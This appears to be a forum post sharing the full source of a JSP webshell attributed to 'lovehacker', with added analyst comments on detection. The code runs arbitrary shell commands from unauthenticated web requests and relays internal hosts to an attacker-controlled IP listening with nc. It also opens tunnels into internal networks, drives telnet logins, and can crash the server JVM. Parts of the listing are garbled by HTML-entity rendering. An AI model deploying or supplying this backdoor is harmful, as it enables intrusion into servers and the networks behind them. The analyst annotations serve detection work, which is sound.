JSP的WEBSHELL

这东西在国内可不多.现在也许用不上,但是总有一天会用上的.LOVEHACKER写的

 1   
 2/*   
 3* WEBSHELL.JSP   
 4*   
 5* Author: lovehacker   
 6* E-mail: [email protected]   
 7*   
 8* 使用方法:   
 9* ]http://victim/webshell.jsp?[options]   
10* options:   
11* action=piped&remoteHost=&remotePort=&myIp=&myPort=   
12* action=tunnel&remoteHost=&remotePort=&myPort=   
13* action=login&username=&password=&myPort=   
14* action=send&myShell=&myPort=&cmd=   
15* action=close&myPort=   
16* action=shell&cmd=   
17* 例子:   
18* action=piped&remoteHost=192.168.0.1&remotePort=25&myIp=218.0.0.1&myPort=12345 -- 将192.168.0.1的25端口与218.0.0.1的12345端口连接起来(可以先用NC监听12345端口)。适用于你无法直接访问已控制的WEB服务器的内网里某机器的某端口,而防火墙又未过滤该WEB服务器向外的连接。   
19* action=tunnel&remoteHost=192.168.0.1&remotePort=23&myPort=65534 -- 实现通过访问该webshell.jsp访问内网某主机telnet服务的功能。(原本想实现通过访问webshell.jsp实现对内网任意服务访问的功能,但jsp功能有限实现起来较为复杂),适用于你控制的机器只开了80端口,并且防火墙不允许它访问Internet,而你又非常想访问它内网某主机的Telnet服务:-)   
20* action=login&username=root&password=helloroot&myPort=65534 -- 上一步只是告诉了要Telnet那台机器,这一步才开始真正登陆,你要输入要telnet主机的正确的用户名密码才行喔,要不然谁也没办法。   
21* action=send&myShell=&myPort=&cmd= -- 上一步如果顺利完成,那么你就可以在上边执行你想执行的命令了。myShell这个参数是结束标记,否则无法知道数据流什么时间该结束(一定要写对喔,否则嘿嘿,就麻烦罗)。cmd这个参数就是你要执行的命令了,比如:“which ssh”,建议你这样玩:myShell=lovehacker&cmd=ls -la;echo lovehacker。   
22* action=close&myPort= -- 你是退出了telnet登陆,但程序在主机上开放的端口还没关闭,所以你要再执行这个命令,现场打扫干净嘛。   
23* action=shell&cmd= -- 在你控制的这台机器上执行命令。Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:\winnt\win.ini   
24* 程序说明:   
25* 想通过jsp实现telnet代理的时候着实头痛了一把,每个请求都是一个新的线程,client socket去连接   
26* telnet服务只能批量命令,无法实现与用户的交互,后来想了个笨办法:把telnet的过程分步完成,接   
27* 收到tunnel命令后,先起两个线程,一个监听端口等待连接,一个先和远程服务器建立好端口连接并一   
28* 直不断开,这下server socket再一次一次的收数据,一次次的转发到远程服务器,就可以记录状态,实   
29* 现和用户的交互了,但总觉得这办法太笨,如果用JSP实现telnet代理功能,你有更好的办法的话请一定   
30* 要来信告诉我。   
31* 版权说明:   
32* 本身实现Telnet的功能我也是在人家代码的基础上修改的,所以:版权没有,你可以任意修改、复制。   
33* 只是加了新功能别忘了Mail一份给我喔!   
34*   
35*   
36*/   
1@ page import="java.io.*" 
1@ page import="java.net.*" 
1@ page import="java.util.*" 
1@ page import="java.awt.Dimension" 
  1   
  // Analyst note: one-way byte pump used by `piped` to splice two sockets together.
  // Reads from `local`'s input stream and writes to `remote`'s output stream on its
  // own thread; two instances are `couple`d to each other so that either side
  // reaching EOF tears down both directions.
  2class redirector implements Runnable   
  3{   
  4private redirector companion = null;   
  5private Socket localSocket, remoteSocket;   
  6private InputStream from;   
  7private OutputStream to;   
  8private byte[] buffer = new byte[4096]; 
  9
// Captures the two sockets and opens their streams. Every exception is
// swallowed, so on failure `from`/`to` stay null and the pump simply dies
// silently on its first read in run().
 10public redirector(Socket local, Socket remote)   
 11{   
 12try {   
 13localSocket = local;   
 14remoteSocket = remote;   
 15from = localSocket.getInputStream();   
 16to = remoteSocket.getOutputStream();   
 17} catch(Exception e) {}   
 18} 
 19
// Registers the reverse-direction pump as `companion` and starts this pump's
// thread; the thread is unnamed, so it shows up in thread dumps as "Thread-N".
 20public void couple(redirector c) {   
 21companion = c;   
 22Thread listen = new Thread(this);   
 23listen.start();   
 24} 
 25
// Clearing `companion` is the loop-exit signal checked by run().
 26public void decouple() { companion = null; } 
 27
// Copies up to 4096 bytes per read until EOF or until decoupled, then closes
// both streams and both sockets and decouples the companion so the reverse
// pump stops as well. All errors are discarded.
 28public void run()   
 29{   
 30int count;   
 31try {   
 32while(companion != null) {   
 33if((count = from.read(buffer)) < 0)   
 34break;   
 35to.write(buffer, 0, count);   
 36}   
 37} catch(Exception e) {}   
 38try {   
 39from.close();   
 40to.close();   
 41localSocket.close();   
 42remoteSocket.close();   
 43if(companion != null) companion.decouple();   
 44} catch(Exception io) {}   
 45}   
 46} 
 47
 // Analyst note: variant of `redirector` used by `tunnel`. Same one-way byte pump,
 // but it watches the relayed data for an in-band "--GoodBye--" marker and, on
 // seeing it, calls System.exit(1) — which terminates the whole JVM hosting the
 // servlet container, not just this relay. Expect a container crash / restart
 // event in server logs whenever the "close" action is used.
 48class redirector1 implements Runnable   
 49{   
 50private redirector1 companion = null;   
 51private Socket localSocket, remoteSocket;   
 52private InputStream from;   
 53private OutputStream to;   
 54private byte[] buffer = new byte[4096]; 
 55
// Same as redirector's constructor: failures are swallowed and leave the
// streams null.
 56public redirector1(Socket local, Socket remote)   
 57{   
 58try {   
 59localSocket = local;   
 60remoteSocket = remote;   
 61from = localSocket.getInputStream();   
 62to = remoteSocket.getOutputStream();   
 63} catch(Exception e) {}   
 64} 
 65
// Registers the reverse pump and starts this pump's thread.
 66public void couple(redirector1 c) {   
 67companion = c;   
 68Thread listen = new Thread(this);   
 69listen.start();   
 70} 
 71
// Loop-exit signal for run().
 72public void decouple() { companion = null; } 
 73
// Relays bytes until EOF or decoupled. Each chunk is decoded with
// `new String(buffer)` — the entire 4096-byte array (not just `count` bytes),
// in the platform default charset — and tested for the "--GoodBye--" prefix.
// Unlike redirector.run(), the normal exit path here only decouples the
// companion; the sockets are left open.
 74public void run()   
 75{   
 76String tmp = "";   
 77int count;   
 78try {   
 79while(companion != null) {   
 80if((count = from.read(buffer)) < 0) break;   
 81tmp = new String(buffer);   
 82if(tmp.startsWith("--GoodBye--"))   
 83{   
 84from.close();   
 85to.close();   
 86remoteSocket.close();   
 87localSocket.close();   
// Kills the entire server process (all webapps, all requests in flight).
 88System.exit(1);   
 89}   
 90to.write(buffer, 0, count);   
 91}   
 92} catch(Exception e) {}   
 93try {   
 94if(companion != null) companion.decouple();   
 95} catch(Exception io) {}   
 96}   
 97} 
 98
 // Analyst note: "piped" action. Opens two *outbound* TCP connections from the
 // server (to raddr1:rport1 and raddr2:rport2) and splices them with a pair of
 // `redirector` pumps. From a network-monitoring standpoint this is the
 // application-server process initiating two new outbound connections on a
 // single HTTP request; the request itself returns immediately.
 99class piped implements Runnable   
100{   
101String remoteHost1,remoteHost2;   
102int remotePort1, remotePort2; 
103
// `connection` is declared but never assigned in this file.
104Thread listener, connection; 
105
106  
// Stores both endpoints and starts the worker thread at MIN_PRIORITY right away.
107public piped(String raddr1,int rport1, String raddr2, int rport2)   
108{   
109remoteHost1 = raddr1; remotePort1 = rport1;   
110remoteHost2 = raddr2; remotePort2 = rport2;   
111listener = new Thread(this);   
112listener.setPriority(Thread.MIN_PRIORITY);   
113listener.start();   
114} 
115
// Connects to both endpoints, then couples two redirectors so bytes flow in
// each direction. On any failure it tries to write an error line to the second
// socket and close it; IOExceptions on that path are discarded.
116public void run()   
117{   
118Socket destinationSocket1 = null;   
119Socket destinationSocket2 = null;   
120try {   
121destinationSocket1 = new Socket(remoteHost1,remotePort1);   
122destinationSocket2 = new Socket(remoteHost2, remotePort2);   
123redirector r1 = new redirector(destinationSocket1, destinationSocket2);   
124redirector r2 = new redirector(destinationSocket2, destinationSocket1);   
125r1.couple(r2);   
126r2.couple(r1);   
127} catch(Exception e) {   
128try {   
129DataOutputStream os = new DataOutputStream(destinationSocket2.getOutputStream());   
130os.writeChars("Remote host refused connection.\n");   
131destinationSocket2.close();   
132} catch(IOException ioe) { }   
133}   
134}   
135} 
136
// Analyst note: "tunnel" action. Binds a listening TCP port *inside the server
// process* and relays every accepted client to one persistent outbound
// connection (raddr:rport). `new ServerSocket(int)` binds to the wildcard
// address, so the listener is reachable from the network, not only loopback.
// The accept loop never exits, so the port stays open for the life of the JVM.
// Detection angle: an application-server process unexpectedly listening on a
// new port, plus a long-lived outbound connection from the same process.
137class tunnel implements Runnable   
138{   
139String remoteHost;   
140int localPort, remotePort; 
141
// `connection` is declared but never assigned in this file.
142Thread listener, connection; 
143
144ServerSocket server; 
145
// Binds the local port (bind failures are swallowed, leaving `server` null)
// and starts the accept thread immediately.
146public tunnel(int lport, String raddr, int rport)   
147{   
148localPort = lport;   
149remoteHost = raddr; remotePort = rport; 
150
151try {   
152server = new ServerSocket(localPort);   
153} catch(Exception e) {} 
154
155listener = new Thread(this);   
156listener.setPriority(Thread.MIN_PRIORITY);   
157listener.start();   
158} 
159
// Opens the single outbound connection once, then loops forever accepting
// clients and coupling each one to that same socket via redirector1 pairs.
// If the bind in the constructor failed, `server` is null and every
// `server.accept()` throws; the `continue` turns that into a busy loop, which
// shows up as a pegged, low-priority thread in the container.
160public void run()   
161{   
162Socket destinationSocket = null;   
163try{   
164destinationSocket = new Socket(remoteHost, remotePort);   
165}catch(Exception e){}   
166while(true)   
167{   
168Socket localSocket = null;   
169try {   
170localSocket = server.accept();   
171} catch(Exception e) {   
172continue;   
173}   
174try {   
175redirector1 r1 = new redirector1(localSocket, destinationSocket);   
176redirector1 r2 = new redirector1(destinationSocket, localSocket);   
177r1.couple(r2);   
178r2.couple(r1);   
179} catch(Exception e) {   
180try {   
181DataOutputStream os = new DataOutputStream(localSocket.getOutputStream());   
182os.writeChars("Remote host refused connection.\n");   
183localSocket.close();   
184} catch(IOException ioe) {}   
185continue;   
186}   
187}   
188}   
189} 
190
// Analyst note: minimal Telnet client transport. The $Id string below identifies
// it as TelnetIO.java rev 1.10 (1998); the author's own header says the telnet
// part was adapted from someone else's code. It owns one socket and implements
// the IAC option-negotiation state machine (WILL/WONT/DO/DONT/SB) so that the
// higher-level TelnetConnect class sees only the cleaned data stream.
// Note on this copy: `>`/`<`/`&` in the lower half of the class appear as HTML
// entities (`&gt;`, `&lt;`, `&amp;`) and one string literal near
// "System.out.print(" is split across lines — artifacts of the page renderer,
// so the listing as shown is not compilable verbatim.
191class TelnetIO   
192{   
193public String toString() { return "$Id: TelnetIO.java,v 1.10 1998/02/09 10:22:18 leo Exp $"; } 
194
// Debug verbosity; 0 here, so none of the System.out diagnostics below fire.
195private int debug = 0; 
196
// Current state of the IAC negotiation state machine (one of STATE_* below).
197private byte neg_state = 0; 
198
199private final static byte STATE_DATA = 0;   
200private final static byte STATE_IAC = 1;   
201private final static byte STATE_IACSB = 2;   
202private final static byte STATE_IACWILL = 3;   
203private final static byte STATE_IACDO = 4;   
204private final static byte STATE_IACWONT = 5;   
205private final static byte STATE_IACDONT = 6;   
206private final static byte STATE_IACSBIAC = 7;   
207private final static byte STATE_IACSBDATA = 8;   
208private final static byte STATE_IACSBDATAIAC = 9; 
209
// Option code of the sub-negotiation currently being collected.
210private byte current_sb; 
211
// Telnet command bytes (RFC 854 values, stored as signed Java bytes).
212private final static byte IAC = (byte)255; 
213
214private final static byte EOR = (byte)239; 
215
216private final static byte WILL = (byte)251; 
217
218private final static byte WONT = (byte)252; 
219
220private final static byte DO = (byte)253; 
221
222private final static byte DONT = (byte)254; 
223
224private final static byte SB = (byte)250; 
225
226private final static byte SE = (byte)240; 
227
228private final static byte TELOPT_ECHO = (byte)1; /* echo on/off */ 
229
230private final static byte TELOPT_EOR = (byte)25; /* end of record */ 
231
232private final static byte TELOPT_NAWS = (byte)31; /* NA-WindowSize*/ 
233
234private final static byte TELOPT_TTYPE = (byte)24; /* terminal type */ 
235
// Pre-built two-byte command prefixes; only IACSB / IACSE are used in this file.
236private final byte[] IACWILL = { IAC, WILL };   
237private final byte[] IACWONT = { IAC, WONT };   
238private final byte[] IACDO = { IAC, DO };   
239private final byte[] IACDONT = { IAC, DONT };   
240private final byte[] IACSB = { IAC, SB };   
241private final byte[] IACSE = { IAC, SE }; 
242
243private final byte TELQUAL_IS = (byte)0; 
244
245private final byte TELQUAL_SEND = (byte)1; 
246
// Per-option memory of what has been received/sent so that the same
// negotiation reply is not repeated. Indexed by option byte + 128 (or by the
// raw byte in a couple of places), sized 256 in connect().
247private byte[] receivedDX; 
248
249private byte[] receivedWX; 
250
251private byte[] sentDX; 
252
253private byte[] sentWX; 
254
255private Socket socket;   
256private BufferedInputStream is;   
257private BufferedOutputStream os; 
258
259//private StatusPeer peer = this; /* peer, notified on status */ 
260
// Opens the TCP connection, wraps the streams and resets negotiation state.
// @throws IOException from Socket / stream construction.
261public void connect(String address, int port) throws IOException {   
262if(debug > 0) System.out.println("Telnet.connect("+address+","+port+")");   
263socket = new Socket(address, port);   
264is = new BufferedInputStream(socket.getInputStream());   
265os = new BufferedOutputStream(socket.getOutputStream());   
266neg_state = 0;   
267receivedDX = new byte[256];   
268sentDX = new byte[256];   
269receivedWX = new byte[256];   
270sentWX = new byte[256];   
271} 
272
// Closes the socket if one was opened.
273public void disconnect() throws IOException {   
274if(debug > 0) System.out.println("TelnetIO.disconnect()");   
275if(socket !=null) socket.close();   
276} 
277
// Convenience overload for the standard telnet port.
278public void connect(String address) throws IOException {   
279connect(address, 23);   
280} 
281
282//public void setPeer(StatusPeer obj) { peer = obj; } 
283
// Number of bytes readable without blocking.
284public int available() throws IOException   
285{   
286return is.available();   
287} 
288
// Reads whatever is currently available (zero bytes if nothing is buffered —
// `is.read` of a zero-length array returns 0, not -1) and strips negotiation
// sequences. Throws "Connection closed." when the stream has hit EOF, which
// is what the callers in TelnetConnect silently swallow.
289public byte[] receive() throws IOException {   
290int count = is.available();   
291byte buf[] = new byte[count];   
292count = is.read(buf);   
293if(count < 0) throw new IOException("Connection closed.");   
294if(debug > 1) System.out.println("TelnetIO.receive(): read bytes: "+count);   
295buf = negotiate(buf, count);   
296return buf;   
297} 
298
// Writes raw bytes and flushes (no IAC escaping is applied here).
299public void send(byte[] buf) throws IOException {   
300if(debug > 1) System.out.println("TelnetIO.send("+buf+")");   
301os.write(buf);   
302os.flush();   
303} 
304
// Single-byte variant of send().
305public void send(byte b) throws IOException {   
306if(debug > 1) System.out.println("TelnetIO.send("+b+")");   
307os.write(b);   
308os.flush();   
309} 
310
// Handles a completed sub-negotiation. Only TTYPE is implemented: on a
// TELQUAL_SEND request it answers IAC SB TTYPE IS <name> IAC SE, where <name>
// comes from notifyStatus() and falls back to "dumb" (notifyStatus() below
// always returns null, so "dumb" is always what is sent).
// `String.getBytes(int,int,byte[],int)` is the deprecated high-byte-dropping
// variant.
311private void handle_sb(byte type, byte[] sbdata, int sbcount)   
312throws IOException   
313{   
314if(debug > 1)   
315System.out.println("TelnetIO.handle_sb("+type+")");   
316switch (type) {   
317case TELOPT_TTYPE:   
318if (sbcount>0 && sbdata[0]==TELQUAL_SEND) {   
319String ttype;   
320send(IACSB);send(TELOPT_TTYPE);send(TELQUAL_IS);   
321/* FIXME: need more logic here if we use   
322* more than one terminal type   
323*/   
324Vector vec = new Vector(2);   
325vec.addElement("TTYPE");   
326ttype = (String)notifyStatus(vec);   
327if(ttype == null) ttype = "dumb";   
328byte[] bttype = new byte[ttype.length()]; 
329
330ttype.getBytes(0,ttype.length(), bttype, 0);   
331send(bttype);   
332send(IACSE);   
333} 
334
335}   
336} 
337
// Status callback hook left over from the original GUI client; in this file it
// is a stub that always returns null, so no terminal type or window size is
// ever supplied to the negotiation code.
338public Object notifyStatus(Vector status) {   
339if(debug > 0)   
340System.out.println("TelnetIO.notifyStatus("+status+")");   
341return null;   
342} 
343
// Runs `count` bytes of `buf` through the IAC state machine, answering
// option requests on the socket as a side effect, and returns only the
// plain data bytes. `neg_state` persists across calls so a sequence split
// over two reads is still parsed. `sbbuf` is sized to `count`, so an
// unusually long sub-negotiation would overrun it (ArrayIndexOutOfBounds).
344private byte[] negotiate(byte buf[], int count) throws IOException {   
345if(debug > 1)   
346System.out.println("TelnetIO.negotiate("+buf+","+count+")");   
347byte nbuf[] = new byte[count];   
348byte sbbuf[] = new byte[count];   
349byte sendbuf[] = new byte[3];   
350byte b,reply;   
351int sbcount = 0;   
352int boffset = 0, noffset = 0;   
353Vector vec = new Vector(2); 
354
355while(boffset < count) {   
356b=buf[boffset++]; 
357
// `b` is already a signed byte, so this test can never be true; harmless no-op.
358if (b>=128)   
359b=(byte)((int)b-256);   
360switch (neg_state) {   
// Plain data: pass through unless an IAC starts a command.
361case STATE_DATA:   
362if (b==IAC) {   
363neg_state = STATE_IAC;   
364} else {   
365nbuf[noffset++]=b;   
366}   
367break;   
// Byte after IAC: IAC IAC is a literal 0xFF; the others select a sub-state.
368case STATE_IAC:   
369switch (b) {   
370case IAC:   
371if(debug > 2)   
372System.out.print("IAC ");   
373neg_state = STATE_DATA;   
374nbuf[noffset++]=IAC;   
375break;   
376case WILL:   
377if(debug > 2)   
378System.out.print("WILL ");   
379neg_state = STATE_IACWILL;   
380break;   
381case WONT:   
382if(debug > 2)   
383System.out.print("WONT ");   
384neg_state = STATE_IACWONT;   
385break;   
386case DONT:   
387if(debug > 2)   
388System.out.print("DONT ");   
389neg_state = STATE_IACDONT;   
390break;   
391case DO:   
392if(debug > 2)   
393System.out.print("DO ");   
394neg_state = STATE_IACDO;   
395break;   
396case EOR:   
397if(debug > 2)   
398System.out.print("EOR ");   
399neg_state = STATE_DATA;   
400break;   
401case SB:   
402if(debug > 2)   
403System.out.print("SB ");   
404neg_state = STATE_IACSB;   
405sbcount = 0;   
406break;   
407default:   
408if(debug > 2)   
// The string literal on the next lines was mangled by the page renderer
// (split across lines, `<unknown ...>` turned into a pseudo-tag); in the
// original it is a single debug string containing the unknown command byte.
409System.out.print(   
410"

<unknown "+b+"=""> "
);
neg_state = STATE_DATA;
break;
}
break;
// Peer announced WILL <option>: reply DO for ECHO and EOR, DONT otherwise,
// but only if this differs from what was last sent/received for that option.
case STATE_IACWILL:
switch(b) {
case TELOPT_ECHO:
if(debug &gt; 2)
System.out.println("ECHO");
reply = DO;
vec = new Vector(2);
vec.addElement("NOLOCALECHO");
notifyStatus(vec);
break;
case TELOPT_EOR:
if(debug &gt; 2)
System.out.println("EOR");
reply = DO;
break;
default:
if(debug &gt; 2)
System.out.println(
"<unknown,"+b+">"
);
reply = DONT;
break;
}
if(debug &gt; 1)
System.out.println("&lt;"+b+", WILL ="+WILL+"&gt;");
if ( reply != sentDX[b+128] ||
WILL != receivedWX[b+128]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentDX[b+128] = reply;
receivedWX[b+128] = WILL;
}
neg_state = STATE_DATA;
break;
// Peer announced WONT <option>: always reply DONT (dedup as above). Note the
// bookkeeping records WILL rather than WONT in receivedWX here.
case STATE_IACWONT:
switch(b) {
case TELOPT_ECHO:
if(debug &gt; 2)
System.out.println("ECHO");

vec = new Vector(2);
vec.addElement("LOCALECHO");
notifyStatus(vec);
reply = DONT;
break;
case TELOPT_EOR:
if(debug &gt; 2)
System.out.println("EOR");
reply = DONT;
break;
default:
if(debug &gt; 2)
System.out.println(
"<unknown,"+b+">"
);
reply = DONT;
break;
}
if ( reply != sentDX[b+128] ||
WONT != receivedWX[b+128]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentDX[b+128] = reply;
receivedWX[b+128] = WILL;
}
neg_state = STATE_DATA;
break;
// Peer asked DO <option>: WILL for ECHO and TTYPE; NAWS needs a window size
// from notifyStatus(), which is always null here, so the WONT branch runs.
case STATE_IACDO:
switch (b) {
case TELOPT_ECHO:
if(debug &gt; 2)
System.out.println("ECHO");
reply = WILL;
vec = new Vector(2);
vec.addElement("LOCALECHO");
notifyStatus(vec);
break;
case TELOPT_TTYPE:
if(debug &gt; 2)
System.out.println("TTYPE");
reply = WILL;
break;
case TELOPT_NAWS:
if(debug &gt; 2)
System.out.println("NAWS");
vec = new Vector(2);
vec.addElement("NAWS");
Dimension size = (Dimension)
notifyStatus(vec);
receivedDX[b] = DO;
if(size == null)
{
/* this shouldn't happen */
send(IAC);
send(WONT);
send(TELOPT_NAWS);
reply = WONT;
sentWX[b] = WONT;
break;
}
reply = WILL;
sentWX[b] = WILL;
sendbuf[0]=IAC;
sendbuf[1]=WILL;
sendbuf[2]=TELOPT_NAWS;
send(sendbuf);
send(IAC);send(SB);send(TELOPT_NAWS);
send((byte) (size.width &gt;&gt; 8));
send((byte) (size.width &amp; 0xff));
send((byte) (size.height &gt;&gt; 8));
send((byte) (size.height &amp; 0xff));
send(IAC);send(SE);
break;
default:
if(debug &gt; 2)
System.out.println(
"<unknown,"+b+">"
);
reply = WONT;
break;
}
if ( reply != sentWX[128+b] ||
DO != receivedDX[128+b]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentWX[b+128] = reply;
receivedDX[b+128] = DO;
}
neg_state = STATE_DATA;
break;
// Peer asked DONT <option>: always reply WONT (dedup as above).
case STATE_IACDONT:
switch (b) {
case TELOPT_ECHO:
if(debug &gt; 2)
System.out.println("ECHO");
reply = WONT;
vec = new Vector(2);
vec.addElement("NOLOCALECHO");
notifyStatus(vec);
break;
case TELOPT_NAWS:
if(debug &gt; 2)
System.out.println("NAWS");
reply = WONT;
break;
default:
if(debug &gt; 2)
System.out.println(
"<unknown,"+b+">"
);
reply = WONT;
break;
}
if ( reply != sentWX[b+128] ||
DONT != receivedDX[b+128]
) {
send(IAC);send(reply);send(b);
sentWX[b+128] = reply;
receivedDX[b+128] = DONT;
}
neg_state = STATE_DATA;
break;
// IAC SB IAC ...: only IAC SB IAC IAC is accepted; anything else is logged
// unconditionally (the one System.out here that is not gated by `debug`).
case STATE_IACSBIAC:
if(debug &gt; 2) System.out.println(""+b+" ");
if (b == IAC) {
sbcount = 0;
current_sb = b;
neg_state = STATE_IACSBDATA;
} else {
System.out.println("(bad) "+b+" ");
neg_state = STATE_DATA;
}
break;
// Byte after IAC SB names the option being sub-negotiated.
case STATE_IACSB:
if(debug &gt; 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBIAC;
break;
default:
current_sb = b;
sbcount = 0;
neg_state = STATE_IACSBDATA;
break;
}
break;
// Sub-negotiation payload accumulates in sbbuf until IAC.
case STATE_IACSBDATA:
if (debug &gt; 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBDATAIAC;
break;
default:
sbbuf[sbcount++] = b;
break;
}
break;
// IAC inside payload: IAC IAC is a literal, IAC SE ends it (handle_sb),
// IAC SB chains straight into another sub-negotiation.
case STATE_IACSBDATAIAC:
if (debug &gt; 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBDATA;
sbbuf[sbcount++] = IAC;
break;
case SE:
handle_sb(current_sb,sbbuf,sbcount);
current_sb = 0;
neg_state = STATE_DATA;
break;
case SB:
handle_sb(current_sb,sbbuf,sbcount);
neg_state = STATE_IACSB;
break;
default:
neg_state = STATE_DATA;
break;
}
break;
default:
if (debug &gt; 2)
System.out.println(
"This should not happen: "+
neg_state+" "
);
neg_state = STATE_DATA;
break;
}
}
// Shrink to the number of data bytes actually kept.
buf = new byte[noffset];
System.arraycopy(nbuf, 0, buf, 0, noffset);
return buf;
}
}

// Analyst note: thin session layer over TelnetIO used by the "login" and "send"
// actions. It always connects to "localhost":port — i.e. to the listener that a
// prior "tunnel" action bound inside this same server process — and drives the
// remote telnet session one request at a time: wait for a prompt, send a line.
// Every IOException is swallowed; see wait()/waitshell() for the consequence.
// `&amp;&amp;` in waitshell() is an HTML-entity artifact of the page renderer.
class TelnetConnect
{
TelnetIO tio = new TelnetIO();
int port = 0;
// Only records the local port; no network activity until connect().
public TelnetConnect(int port)
{
this.port = port;
}

// Connects to the local tunnel port; a failed connect is silently ignored.
public void connect()
{
try {
tio.connect("localhost",port);
} catch(IOException e) {}
}

// Closes the underlying socket; errors ignored.
public void disconnect()
{
try{
tio.disconnect();
}catch(IOException e){}
}

// Accumulates received data until `prompt` appears and returns everything
// read so far. Bytes are decoded with the deprecated `String(byte[], int hibyte)`
// constructor. Because "Connection closed." from tio.receive() is swallowed,
// a closed or never-opened connection makes this loop spin forever and the
// HTTP request never completes — one observable symptom of a failed session.
private String wait(String prompt)
{
String tmp = "";
do {
try {
tmp += new String(tio.receive(), 0);
}catch(IOException e) {}
} while(tmp.indexOf(prompt) == -1);
return tmp;
}

// Single non-blocking read; returns null on error. Not referenced in this file.
private byte[] receive()
{
byte[] temp = null;
try{
temp = tio.receive();
}catch(IOException e){}
return temp;
}

// Like wait(), but returns once any of "$", "#" or "%" has been seen
// (heuristic for a Unix shell prompt). Same unbounded-loop behaviour.
private String waitshell()
{
String tmp = "";
do {
try { tmp += new String(tio.receive(), 0); }
catch(IOException e) {}
} while((tmp.indexOf("$") == -1)&amp;&amp;(tmp.indexOf("#") == -1)&amp;&amp;(tmp.indexOf("%") == -1));
return tmp;
}

// Sends the string's low bytes (deprecated getBytes(int,int,byte[],int));
// errors ignored.
private void send(String str)
{
byte[] buf = new byte[str.length()];
str.getBytes(0, str.length(), buf, 0);
try { tio.send(buf); } catch(IOException e) {}
}
}

// Analyst note: request dispatcher (JSP scriptlet body). Every control value
// below comes straight from query/form parameters with no validation or
// authentication of any kind; `action.equals(...)` throws NullPointerException
// (HTTP 500) when `action` is absent, and Integer.parseInt on the port
// parameters throws NumberFormatException on non-numeric input.
// For log-based detection: each action is one GET/POST to this JSP with an
// `action=` parameter; the parameter names below are the indicators.
String action = request.getParameter("action");
String cmd = request.getParameter("cmd");
String remoteHost = request.getParameter("remoteHost");
String myIp = request.getParameter("myIp");
String myPort = request.getParameter("myPort");
String remotePort = request.getParameter("remotePort");
String username = request.getParameter("username");
String password = request.getParameter("password");
String myShell = request.getParameter("myShell");
// "shell": executes the raw `cmd` string via Runtime.exec as the account the
// servlet container runs under, and streams the child's stdout into the HTTP
// response byte-by-byte. stderr is never read. Host-level signal: the
// application-server process spawning child processes (sh, cmd.exe, ...).
if(action.equals("shell")){
try {
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) { out.print((char)c); }
in.close();
try { child.waitFor();} catch (InterruptedException e) {}
} catch (IOException e) {}
// "piped": two outbound connections spliced together (see class piped);
// the worker thread outlives this request.
}else if(action.equals("piped")){
piped me = new piped(remoteHost,Integer.parseInt(remotePort),myIp,Integer.parseInt(myPort));
// "tunnel": binds a listening port in this JVM and relays it to
// remoteHost:remotePort (see class tunnel); listener persists after the request.
}else if(action.equals("tunnel")){
tunnel me = new tunnel(Integer.parseInt(myPort),
remoteHost, Integer.parseInt(remotePort));
// "login": drives a telnet login through the local tunnel port, echoing the
// banner/prompt text back in the response. Credentials travel as plain HTTP
// parameters and then in clear text over telnet.
}else if(action.equals("login")){
TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort));
tc.connect();
out.print(tc.wait("login:"));
tc.send(username+"\r");
out.print(tc.wait("Password:"));
tc.send(password+"\r");
out.print(tc.waitshell());
tc.disconnect();
// "send": one command line over the existing telnet session; `myShell` is the
// end-of-output marker wait() scans for (unless it is literally "logout").
}else if(action.equals("send")){
TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort));
tc.connect();
tc.send(cmd+"\r");
if(!myShell.equals("logout"))
out.print(tc.wait(myShell));
tc.disconnect();
// "close": connects to the local tunnel port and writes the "--GoodBye--"
// marker. redirector1 reacts to that marker with System.exit(1), so this
// action terminates the whole servlet-container JVM — a crash/restart of the
// web server is the expected trace of its use.
}else if(action.equals("close")){
try{
Socket s = new Socket("127.0.0.1",Integer.parseInt(myPort));
DataOutputStream dos = new DataOutputStream(s.getOutputStream());
PrintStream ps = new PrintStream(dos);
ps.println("--GoodBye--");
ps.close();
dos.close();
s.close();
}catch(Exception e){}
// Fallback banner. The quoting on this line is broken in this copy (inner
// double quotes unescaped) — a renderer artifact; in the deployed file it is
// a single HTML string and is a usable grep signature for this shell.
}else{
out.print("<font color="black" size="7">You Love Hacker Too?");
}
